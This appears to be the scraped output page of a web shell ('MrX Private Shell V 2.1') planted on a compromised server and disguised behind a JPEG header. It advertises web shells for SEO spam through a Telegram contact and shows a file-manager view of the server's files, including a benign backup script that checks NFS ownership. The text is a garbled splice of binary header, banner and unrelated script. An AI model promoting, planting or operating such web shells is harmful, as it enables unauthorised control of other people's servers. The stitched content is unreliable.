����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
# check if NFS user is nobody - for rsync restore this is a NOGO
nfs_uid=$(ls -l "$BUILD_DIR/outputfs" | tail -1 | awk '{print $3}')
case "$nfs_uid" in
"nobody"|"-1"|"-2"|"4294967294")
Error "RBME rsync restore will result in a broken system (owner=$nfs_uid).
Please add in $CONFIG_DIR/local.conf BACKUP_OPTIONS=\"nfsvers=3,nolock\"
"
;;
esac
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| 100_mount_NETFS_path.sh | File | 140 B | 0644 |
|
| 150_check_nobody_uid_nfs.sh | File | 363 B | 0644 |
|
| 540_choose_backup.sh | File | 1.56 KB | 0644 |
|